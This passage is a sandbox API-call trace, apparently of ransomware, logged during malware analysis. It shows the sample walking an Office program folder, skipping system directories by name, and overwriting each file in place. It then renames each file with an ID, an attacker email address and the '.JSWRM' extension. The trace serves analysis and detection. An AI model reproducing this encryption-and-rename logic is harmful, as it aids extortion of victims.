lstrcmpiW (lpString1="FOLDPROJ.XML", lpString2="..") returned 1 [0141.888] lstrcmpiW (lpString1="FOLDPROJ.XML", lpString2="...") returned 1 [0141.888] lstrcmpiW (lpString1="FOLDPROJ.XML", lpString2="windows") returned -1 [0141.888] lstrcmpiW (lpString1="FOLDPROJ.XML", lpString2="recovery") returned -1 [0141.888] lstrcmpiW (lpString1="FOLDPROJ.XML", lpString2="perflogs") returned -1 [0141.888] lstrcmpiW (lpString1="FOLDPROJ.XML", lpString2="documents and settings") returned 1 [0141.888] lstrcmpiW (lpString1="FOLDPROJ.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.888] lstrcmpiW (lpString1="FOLDPROJ.XML", lpString2="system volume information") returned -1 [0141.888] lstrcmpiW (lpString1="FOLDPROJ.XML", lpString2="msocache") returned -1 [0141.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOLDPROJ.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOLDPROJ.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FOLDPROJ.XML", lpUsedDefaultChar=0x0) returned 12 [0141.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOLDPROJ.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOLDPROJ.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FOLDPROJ.XML", lpUsedDefaultChar=0x0) returned 12 [0141.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FOLDPROJ.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\foldproj.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.889] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1580) returned 1 [0141.889] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.889] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x620, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x620, lpOverlapped=0x0) returned 1 [0141.890] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.890] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x620, lpOverlapped=0x0) returned 1 [0141.891] CloseHandle (hObject=0x238) returned 1 [0141.891] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FOLDPROJ.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\foldproj.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FOLDPROJ.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\foldproj.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.892] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b38968, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b38968, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b5ebb7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8c952, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="FORM98.POC", cAlternateFileName="")) returned 1 [0141.892] lstrcmpiW (lpString1="FORM98.POC", lpString2=".") returned 1 [0141.892] lstrcmpiW (lpString1="FORM98.POC", lpString2="..") returned 1 [0141.892] lstrcmpiW (lpString1="FORM98.POC", lpString2="...") returned 1 [0141.892] lstrcmpiW (lpString1="FORM98.POC", lpString2="windows") returned -1 [0141.892] lstrcmpiW (lpString1="FORM98.POC", lpString2="recovery") returned -1 [0141.892] lstrcmpiW (lpString1="FORM98.POC", lpString2="perflogs") returned -1 [0141.892] lstrcmpiW (lpString1="FORM98.POC", lpString2="documents and settings") returned 1 [0141.892] lstrcmpiW (lpString1="FORM98.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.892] lstrcmpiW (lpString1="FORM98.POC", lpString2="system volume information") returned -1 [0141.892] lstrcmpiW (lpString1="FORM98.POC", lpString2="msocache") returned -1 [0141.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FORM98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FORM98.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FORM98.POC", lpUsedDefaultChar=0x0) returned 10 [0141.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FORM98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FORM98.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FORM98.POC", lpUsedDefaultChar=0x0) returned 10 [0141.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FORM98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\form98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.893] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=575826) returned 1 [0141.893] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.893] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0141.907] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.907] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0141.907] CloseHandle (hObject=0x238) returned 1 [0141.907] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FORM98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\form98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FORM98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\form98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.908] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b5ebb7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b5ebb7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b5ebb7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x820, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="FORMCTL.POC", cAlternateFileName="")) returned 1 [0141.908] lstrcmpiW (lpString1="FORMCTL.POC", lpString2=".") returned 1 [0141.908] lstrcmpiW (lpString1="FORMCTL.POC", lpString2="..") returned 1 [0141.909] lstrcmpiW (lpString1="FORMCTL.POC", lpString2="...") returned 1 [0141.909] lstrcmpiW (lpString1="FORMCTL.POC", lpString2="windows") returned -1 [0141.909] lstrcmpiW (lpString1="FORMCTL.POC", lpString2="recovery") returned -1 [0141.909] lstrcmpiW (lpString1="FORMCTL.POC", lpString2="perflogs") returned -1 [0141.909] lstrcmpiW (lpString1="FORMCTL.POC", lpString2="documents and settings") returned 1 [0141.909] lstrcmpiW (lpString1="FORMCTL.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.909] lstrcmpiW (lpString1="FORMCTL.POC", lpString2="system volume information") returned -1 [0141.909] lstrcmpiW (lpString1="FORMCTL.POC", lpString2="msocache") returned -1 [0141.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FORMCTL.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FORMCTL.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FORMCTL.POC", lpUsedDefaultChar=0x0) returned 11 [0141.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FORMCTL.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FORMCTL.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FORMCTL.POC", lpUsedDefaultChar=0x0) returned 11 [0141.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FORMCTL.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\formctl.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.910] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2080) returned 1 [0141.910] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.910] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x820, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x820, lpOverlapped=0x0) returned 1 [0141.912] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.912] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x820, lpOverlapped=0x0) returned 1 [0141.912] CloseHandle (hObject=0x238) returned 1 [0141.912] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FORMCTL.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\formctl.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FORMCTL.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\formctl.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.913] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b5ebb7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b5ebb7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b5ebb7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b8, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="FS3BOX.POC", cAlternateFileName="")) returned 1 [0141.914] lstrcmpiW (lpString1="FS3BOX.POC", lpString2=".") returned 1 [0141.914] lstrcmpiW (lpString1="FS3BOX.POC", lpString2="..") returned 1 [0141.914] lstrcmpiW (lpString1="FS3BOX.POC", lpString2="...") returned 1 [0141.914] lstrcmpiW (lpString1="FS3BOX.POC", lpString2="windows") returned -1 [0141.914] lstrcmpiW (lpString1="FS3BOX.POC", lpString2="recovery") returned -1 [0141.914] lstrcmpiW (lpString1="FS3BOX.POC", lpString2="perflogs") returned -1 [0141.914] lstrcmpiW (lpString1="FS3BOX.POC", lpString2="documents and settings") returned 1 [0141.914] lstrcmpiW (lpString1="FS3BOX.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.914] lstrcmpiW (lpString1="FS3BOX.POC", lpString2="system volume information") returned -1 [0141.914] lstrcmpiW (lpString1="FS3BOX.POC", lpString2="msocache") returned -1 [0141.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FS3BOX.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FS3BOX.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FS3BOX.POC", lpUsedDefaultChar=0x0) returned 10 [0141.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FS3BOX.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FS3BOX.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FS3BOX.POC", lpUsedDefaultChar=0x0) returned 10 [0141.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FS3BOX.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\fs3box.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.915] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=952) returned 1 [0141.915] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.916] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x3b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x3b0, lpOverlapped=0x0) returned 1 [0141.917] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.917] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x3b0, lpOverlapped=0x0) returned 1 [0141.917] CloseHandle (hObject=0x238) returned 1 [0141.917] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FS3BOX.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\fs3box.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FS3BOX.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\fs3box.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.918] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b84e38, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b84e38, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b84e38, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb0c3, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="GIFT.DPV", cAlternateFileName="")) returned 1 [0141.918] lstrcmpiW (lpString1="GIFT.DPV", lpString2=".") returned 1 [0141.918] lstrcmpiW (lpString1="GIFT.DPV", lpString2="..") returned 1 [0141.918] lstrcmpiW (lpString1="GIFT.DPV", lpString2="...") returned 1 [0141.918] lstrcmpiW (lpString1="GIFT.DPV", lpString2="windows") returned -1 [0141.918] lstrcmpiW (lpString1="GIFT.DPV", lpString2="recovery") returned -1 [0141.918] lstrcmpiW (lpString1="GIFT.DPV", lpString2="perflogs") returned -1 [0141.918] lstrcmpiW (lpString1="GIFT.DPV", lpString2="documents and settings") returned 1 [0141.918] lstrcmpiW (lpString1="GIFT.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.918] lstrcmpiW (lpString1="GIFT.DPV", lpString2="system volume information") returned -1 [0141.918] lstrcmpiW (lpString1="GIFT.DPV", lpString2="msocache") returned -1 [0141.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIFT.DPV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIFT.DPV", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GIFT.DPV", lpUsedDefaultChar=0x0) returned 8 [0141.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIFT.DPV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIFT.DPV", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GIFT.DPV", lpUsedDefaultChar=0x0) returned 8 [0141.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GIFT.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\gift.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.919] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=45251) returned 1 [0141.919] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.920] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb0c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xb0c0, lpOverlapped=0x0) returned 1 [0141.924] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.924] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb0c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xb0c0, lpOverlapped=0x0) returned 1 [0141.924] CloseHandle (hObject=0x238) returned 1 [0141.924] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GIFT.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\gift.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\GIFT.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\gift.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.925] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b84e38, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b84e38, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b84e38, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14c8, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="GIFT.XML", cAlternateFileName="")) returned 1 [0141.925] lstrcmpiW (lpString1="GIFT.XML", lpString2=".") returned 1 [0141.925] lstrcmpiW (lpString1="GIFT.XML", lpString2="..") returned 1 [0141.926] lstrcmpiW (lpString1="GIFT.XML", lpString2="...") returned 1 [0141.926] lstrcmpiW (lpString1="GIFT.XML", lpString2="windows") returned -1 [0141.926] lstrcmpiW (lpString1="GIFT.XML", lpString2="recovery") returned -1 [0141.926] lstrcmpiW (lpString1="GIFT.XML", lpString2="perflogs") returned -1 [0141.926] lstrcmpiW (lpString1="GIFT.XML", lpString2="documents and settings") returned 1 [0141.926] lstrcmpiW (lpString1="GIFT.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.926] lstrcmpiW (lpString1="GIFT.XML", lpString2="system volume information") returned -1 [0141.926] lstrcmpiW (lpString1="GIFT.XML", lpString2="msocache") returned -1 [0141.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIFT.XML", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIFT.XML", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GIFT.XML", lpUsedDefaultChar=0x0) returned 8 [0141.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIFT.XML", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIFT.XML", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GIFT.XML", lpUsedDefaultChar=0x0) returned 8 [0141.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 